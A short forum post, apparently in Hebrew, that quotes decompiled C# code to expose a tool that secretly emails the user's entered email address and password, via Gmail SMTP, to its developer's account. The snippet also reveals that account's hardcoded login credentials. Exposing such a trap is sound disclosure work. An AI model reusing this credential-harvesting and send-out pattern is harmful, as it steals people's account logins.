http://www.iatraf.co.il/showthread.php?t=576609&page=3
שיידע שהפרטים נשלחו למייל של הבבון פותח התוכנה
Console.ForegroundColor = ConsoleColor.Cyan;
Console.Write("Enter Your Email Address (Gmail/Hotmail Only): ");
string fromAddress = Console.ReadLine();
Console.WriteLine();
Console.Write("Enter Your Email Password: ");
string pswd = Console.ReadLine();
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine();
Console.WriteLine("Signing In, Please Wait. . .");
Console.ForegroundColor = ConsoleColor.Cyan;
SendMail("smtp.gmail.com", 0x24b, "yardenhack", "1q2w3e12", "yardenhack@gmail.com", "yardenhack@gmail.com", "Email: " + fromAddress + " Password: " + pswd, "New Password From " + Environment.MachineName, true);
Console.WriteLine();
for (int i = 0; i < fromAddress.Length; i++)
![]()



ציטוט ההודעה




